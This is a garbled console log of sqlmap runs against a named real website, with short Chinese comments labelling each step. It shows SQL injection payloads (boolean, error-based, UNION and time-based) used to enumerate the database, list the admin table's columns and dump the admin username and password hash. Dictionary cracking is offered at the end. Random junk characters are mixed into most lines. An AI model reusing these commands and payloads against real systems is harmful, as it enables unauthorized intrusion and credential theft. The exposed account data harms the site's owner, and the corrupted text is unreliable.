D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
; _ j4 y' c* j. `6 \& ]ms "Mysql" --current-user /* 注解:获取当前用户名称6 m7 s- g. i7 p1 g
sqlmap/0.9 - automatic SQL injection and database takeover tool
& R* p* F1 d( B http://sqlmap.sourceforge.net starting at: 16:53:549 `- `5 ]' \! ^+ C% Z6 d2 g2 n: C, b
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
1 N- {8 Q( H& S/ l ^" a5 h" p session file
5 ^$ z8 ]. v* ]* g# F( t[16:53:54] [INFO] resuming injection data from session file5 j# w9 |' H9 Q5 l) w# A$ k x
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
3 q8 R5 }; E: r8 [[16:53:54] [INFO] testing connection to the target url
9 R& y4 o0 I9 c. k( @! [sqlmap identified the following injection points with a total of 0 HTTP(s) reque
, ^- C/ A0 X! I% B2 y+ S/ qsts:
: m6 ?( ^, ~% y" n---
* Y; `# a; |* H' H, ?1 g6 xPlace: GET
" `! N- A8 ]; U" E% C) j* [Parameter: id
0 K2 [: d. Y6 e) B Type: boolean-based blind
/ L6 B2 [3 W4 c8 ]$ i* ?9 H+ A Title: AND boolean-based blind - WHERE or HAVING clause, V2 `/ s4 }+ @; c4 L
Payload: id=276 AND 799=7993 C8 g. U; J/ @, j5 J8 k! e, |& j
Type: error-based
5 C7 p& l" A! K2 L4 K% a; e Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
8 ?0 r; X& X. I0 j2 i Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,& q8 ]' {8 O6 U; N! X" G* v8 b+ B
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58' V, H& m. C4 c, u6 u h
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
0 F9 w: {" C" I2 T* s7 U Type: UNION query
: A6 H( p, y9 t5 V Title: MySQL UNION query (NULL) - 1 to 10 columns# A) `. D& s4 s- g
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR" a! Z7 a5 T. y
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),. s+ @- N# Z+ w2 k, t7 e$ m/ r7 P
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
; D! z+ p& R: [5 ] Type: AND/OR time-based blind
9 J% g$ T4 ?+ }; G Title: MySQL > 5.0.11 AND time-based blind; }, ?6 B' E+ S- I( y- l3 L& P! M
Payload: id=276 AND SLEEP(5)/ i/ f# p- N# r) T; e" D3 C" t
---
) Z7 q* q3 w+ G3 i+ k- ?7 r' O[16:53:55] [INFO] the back-end DBMS is MySQL+ H: O6 }* ~# R9 L0 j
web server operating system: Windows
7 ?6 W/ u/ x+ p; ~web application technology: Apache 2.2.11, PHP 5.3.0
4 R2 _1 [+ Q% A% Q# Aback-end DBMS: MySQL 5.01 d2 ^: q$ [$ }) }& W( ?( x
[16:53:55] [INFO] fetching current user+ d& D. q% r! b2 P8 X
current user: 'root@localhost'
# [" f* o$ m T1 r1 ]' a C[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
/ P, D: L; I8 o4 P+ ^6 G. ntput\www.wepost.com.hk' shutting down at: 16:53:58' T: O! M3 g/ f
8 l4 ~7 c: x7 x6 ]D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db* `5 F) Q# Q5 ]- Y4 j5 ~/ \
ms "Mysql" --current-db /*当前数据库
5 _" p. q1 d; M& ~, b% d sqlmap/0.9 - automatic SQL injection and database takeover tool9 @9 c6 f; f r; {2 e6 m
http://sqlmap.sourceforge.net starting at: 16:54:16
4 Z/ w# w) V" ?4 d& b3 x" }[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
5 v9 C3 Z( X4 { session file
5 [/ c0 p; q& }& [4 q1 z/ A$ ~[16:54:16] [INFO] resuming injection data from session file$ c! {0 f" J& h$ v
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
; i7 e. s" k4 y8 @1 L* q; v( G& Z( D! \: ~[16:54:16] [INFO] testing connection to the target url* t- S! K7 E" k! z- ]
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
2 d9 {) I8 x( Lsts:
: c7 f5 `$ H" k& {) g8 ]% U+ n---( ^/ F% c, |+ O8 Y; |
Place: GET
4 i1 z( C; V/ K. Z, J5 vParameter: id
) p: [ g- ]( W$ U( u2 ~# h Type: boolean-based blind
8 h: Z5 P: v" H" y: N Title: AND boolean-based blind - WHERE or HAVING clause
) y) a. w7 P% u4 q- ?4 J Payload: id=276 AND 799=7997 k. E R4 G1 Y$ O5 y- x
Type: error-based$ W4 i' s+ g& d7 Y& D; Z9 n
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause* g, ^5 h l- l/ v# f
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
: ^9 r- q" l# o) g8 i120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
. I! w- p# ^7 a& V# X),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
0 f8 Z" T G4 A) W% h& L9 e Type: UNION query5 v- C" m% Z; | J
Title: MySQL UNION query (NULL) - 1 to 10 columns
% j: n" J; d& m- E$ H9 Z Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR; E/ V- {, ]1 [1 U9 f
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
* }1 K# j/ ?; T, I# U4 Q8 pCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#: g7 D: q( Y' e/ s, x
Type: AND/OR time-based blind0 T6 b. I: ?3 e6 P$ E; R
Title: MySQL > 5.0.11 AND time-based blind
3 B- Z$ e. E& T Payload: id=276 AND SLEEP(5)" M- M; I7 h8 n4 H8 I
---+ A7 b, S% F) m9 J& _( C+ x$ O
[16:54:17] [INFO] the back-end DBMS is MySQL; H; ~9 X+ D6 F \) G
web server operating system: Windows
" L: {, f' i# O5 Y0 n* H, M; ?- rweb application technology: Apache 2.2.11, PHP 5.3.0
% F# t, j% U% ^8 ]# Lback-end DBMS: MySQL 5.00 d9 I" K) F P# B
[16:54:17] [INFO] fetching current database
! M3 | u. ?. d7 o7 Icurrent database: 'wepost'2 w3 W9 z; D2 S9 A2 b2 m
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
7 d4 _# Q" d7 F# i* Rtput\www.wepost.com.hk' shutting down at: 16:54:18
3 J c, k9 d% N) h) sD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
5 @+ K7 e& D4 \ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
5 h2 @6 s# |9 Y5 j sqlmap/0.9 - automatic SQL injection and database takeover tool) n9 H( A2 ^5 E6 v- e" u
http://sqlmap.sourceforge.net starting at: 16:55:25
7 ]5 r5 q0 J- ~+ a+ e[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as: ]1 _5 B# R, d, P
session file) `9 I7 ]/ N" c( `+ ^+ M) _
[16:55:25] [INFO] resuming injection data from session file
0 Y' J, Z; K2 R[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
# j: g( a5 i: A2 o[16:55:25] [INFO] testing connection to the target url
+ ^% u$ [! T( `* p- ]" Psqlmap identified the following injection points with a total of 0 HTTP(s) reque
, G% R+ r, F. u+ K- U5 W& J5 }sts:+ ~& t8 U0 S ]7 ]! e2 W* ~
---: _' y' A! m. |2 D- \- [1 h
Place: GET
+ O9 a2 F6 T4 U1 K2 [3 H$ F. @: aParameter: id
, _3 r1 F! f# `0 m) b) `% Y Type: boolean-based blind
6 v+ y3 p7 d& t Title: AND boolean-based blind - WHERE or HAVING clause5 Z8 s0 X3 Y/ E; \* B
Payload: id=276 AND 799=799% T& }; o, e% i% Q0 ^/ r5 e/ \, a
Type: error-based
% b5 q5 P) W( f( ~! h Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
) T, d1 P( O+ l7 ^! {; ] Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,1 S( m# x0 p( |/ e9 c5 x
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
! w8 R; g' Q! G* a$ x2 S),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)" Q8 G# N/ w2 g# I2 V0 r
Type: UNION query
8 f: ~6 P2 q3 j+ t% T: y Title: MySQL UNION query (NULL) - 1 to 10 columns
+ W% ~( p; R% `5 ~! j Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR1 s8 [) W4 f, S7 w0 L
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR)," S' b6 }5 F) W0 e+ j) m
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#! U9 \ X+ N; \- S, c$ v4 T2 o- \
Type: AND/OR time-based blind9 i& k: Q9 ?6 A+ ?. |) e4 w" k
Title: MySQL > 5.0.11 AND time-based blind+ Y; t$ G; G8 H; d: B1 _+ b3 t/ u
Payload: id=276 AND SLEEP(5)& Q/ H* r) w3 b* q6 n
---
8 u/ Z ?; F+ V0 N2 W[16:55:26] [INFO] the back-end DBMS is MySQL9 h0 U+ P2 s; j2 O" i# `
web server operating system: Windows; c3 D. a, n3 Q& h& }; H1 }
web application technology: Apache 2.2.11, PHP 5.3.0( d. z4 h( Z' Z4 h3 j5 s% I
back-end DBMS: MySQL 5.00 e- V7 f* R/ b
[16:55:26] [INFO] fetching tables for database 'wepost'
( Y+ W0 ?) M3 _3 n" }# |0 e[16:55:27] [INFO] the SQL query used returns 6 entries, t: V: T6 x; N- g* l2 i
Database: wepost
- I2 d/ P) L7 c2 o7 r[6 tables]
& F9 @7 v* k2 R/ r! H: D2 _- |# c+-------------+
: q$ A( ]( a t/ G. T( f2 B| admin |
/ s' M; f( G0 [$ e| article |
+ L$ m! l2 P8 Z4 J3 M. g| contributor |# P* P- l; V/ n/ d
| idea |
) {( X; j F! b- L' @7 _| image |) M) b6 B5 \/ G" F$ G4 O) W3 B
| issue |5 E4 ]. D$ ?6 Q1 T4 ^" `/ @0 g, v
+-------------+# G6 H3 E# v1 C$ j8 I2 k& V7 j
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
- l( Q, z# s5 d2 s `& d& Wtput\www.wepost.com.hk' shutting down at: 16:55:33
$ m# ^, \$ c; a( q
# v. w- @" Z1 N3 W0 U/ [1 K1 KD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db3 ~7 }; J) r& y. ]+ z
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
% y* `8 C& b0 E# ? j0 W- ]4 r) J sqlmap/0.9 - automatic SQL injection and database takeover tool/ h1 j1 Q8 j! x- `5 @! f% u+ R; R* u
http://sqlmap.sourceforge.net starting at: 16:56:06% A% L ] B. B
sqlmap identified the following injection points with a total of 0 HTTP(s) reque! |3 } |$ y, v* p2 I m4 [
sts:1 F) a7 l" J/ z- x* ^% {
---
; T2 C0 L, _, a5 k! Y( a2 RPlace: GET
* m$ }# a* a+ {" tParameter: id
. u+ ] j, t) `, ~ Type: boolean-based blind/ C, r! [) d4 x
Title: AND boolean-based blind - WHERE or HAVING clause
( X- ^- J* q4 n7 m0 F. ] Payload: id=276 AND 799=799+ _/ Y2 }# s, n
Type: error-based+ W1 m1 v+ L* |' X6 A
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause6 N+ L- \ i/ |6 N
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,+ {, G/ Y$ A- W) Y; {, Y* K
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
% J$ C% @( V! Z+ H),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) V9 X3 G5 K9 [$ A5 p8 T: J2 I
Type: UNION query8 ?/ M/ s2 x- Q3 h# K' b
Title: MySQL UNION query (NULL) - 1 to 10 columns
6 ?8 z/ ]6 Y3 R; R2 H' x* D Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR8 B- [/ [* ?' H: ^& \! G G
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),1 ?% t: M; K. i- p9 K6 {+ j
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#" h1 i( _+ X! s: o! A
Type: AND/OR time-based blind) M& b. t4 J: m3 J: a1 b9 c7 ~+ n! Y
Title: MySQL > 5.0.11 AND time-based blind e. ]/ n/ \$ ^& i. o1 Z9 Y
Payload: id=276 AND SLEEP(5)
" p2 V. u7 \* n# H3 n* N3 N9 K--- ]' g8 T+ \! H: U% D4 H# y7 M5 @
web server operating system: Windows2 u0 v4 u6 @0 f& z" R; V) }9 b. o
web application technology: Apache 2.2.11, PHP 5.3.0/ t/ T6 ]' T* H" `/ p- b" Z0 F
back-end DBMS: MySQL 5.0
! Q0 @$ N. j6 h1 v% Z1 h[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se2 T W# h+ s* k1 K4 r; z9 f) x6 U$ ^3 v
ssion': wepost, wepost
/ u6 Y( f" b8 G9 d" Y4 s# SDatabase: wepost" N! N( Z/ ^% ]' Y" S" ^2 B
Table: admin+ M$ n4 \3 R8 h
[4 columns]+ ]( z+ M' j6 j6 r) C' t6 o9 L0 t
+----------+-------------+1 i6 T& j+ Z0 C2 B0 {, r( f: c$ }. c c' M
| Column | Type |* s6 ]) k" e0 N
+----------+-------------+
" X( Q. _$ ~4 G| id | int(11) |
8 |* n& @, n3 b| password | varchar(32) |
1 u& r2 Z/ I, f" z! ]- n| type | varchar(10) |0 H! {! N8 Y# o) |' Q0 U; |
| userid | varchar(20) |
, b4 U# P* A5 p+----------+-------------+
1 ^1 P9 l- W7 Q* M5 M) E! V shutting down at: 16:56:19: N" q9 O& z. ~ J7 c
, g& g7 j* ^- e- o3 o0 [
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db1 O t8 C( l! _
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容+ D+ a3 G ~( E/ R
sqlmap/0.9 - automatic SQL injection and database takeover tool1 j2 `5 x4 c! F& s
http://sqlmap.sourceforge.net starting at: 16:57:14
' M7 \! o: ~1 E: b$ I2 vsqlmap identified the following injection points with a total of 0 HTTP(s) reque- x! q8 _2 ~' r. z% O0 W
sts:3 a# p" T# g' D5 f9 \) Q' D
---5 n: v4 l2 {2 i5 Z+ s: _
Place: GET0 B( g x& L& o0 ^
Parameter: id5 w" g U5 ~3 G o5 ], _/ o
Type: boolean-based blind
9 r4 b/ l, B% Y6 O0 D! k* c. k/ y0 ? Title: AND boolean-based blind - WHERE or HAVING clause
& |7 W) N2 M9 s Payload: id=276 AND 799=799
' t: x2 S+ c, N; D Type: error-based
2 i) L. B% b( o5 `1 H- R Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause* ?6 Y1 b, j0 _
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,$ v0 J" d+ S) P7 r* U8 _
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
3 g- O& g& K- X1 i4 x% C2 h2 z),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
! N5 H O6 r" g; A7 N. [6 f Type: UNION query
; n& N# h- A3 G, D" a Title: MySQL UNION query (NULL) - 1 to 10 columns
3 r/ Z& [ U8 ?% z$ X' C Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
; W( b: j3 Z9 ~* u(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
2 B( e( ]0 a; ECHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
/ B3 }$ d/ J( C1 |- c Type: AND/OR time-based blind
" @: C* @# ^0 B3 P3 i Title: MySQL > 5.0.11 AND time-based blind
) {2 W- Y8 e2 m, e, u6 c5 J Payload: id=276 AND SLEEP(5)5 F/ e! ]9 |. H3 p5 T
---8 J. \* O9 Q7 L6 {" g
web server operating system: Windows1 e! b1 k8 M7 E! x. }
web application technology: Apache 2.2.11, PHP 5.3.0
2 F* s/ S4 N5 E* {( P! Kback-end DBMS: MySQL 5.0, R' E/ D& v. k! K
recognized possible password hash values. do you want to use dictionary attack o" I m. \# G# w" R+ l+ s
n retrieved table items? [Y/n/q] y
5 i' c% ^. N3 C* y# `3 h3 [* Dwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
: K& [8 A% D. `- C7 x" p2 |6 L2 _do you want to use common password suffixes? (slow!) [y/N] y+ d, e) O: D* j- q
Database: wepost
+ C3 E& _( U/ d8 f" ITable: admin
- ^& ]7 k" Z+ X4 M; U[1 entry]
, n: X7 J+ n' t. H- `2 ^+----------------------------------+------------+8 u5 l6 d% I$ g, i& ~0 n# [
| password | userid |: j" O+ Q. A, r1 y% w% z! X8 c
+----------------------------------+------------+
6 N4 V0 L' e: R| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
1 A, \1 j) L# G+ Q4 x, S! `+----------------------------------+------------+1 a( i8 Y, P7 F W4 I$ ?' J, B
shutting down at: 16:58:14) ]' z9 G! {* r5 S1 T A
2 t0 S( Z9 q+ m1 h1 w4 N8 ID:\Python27\sqlmap> |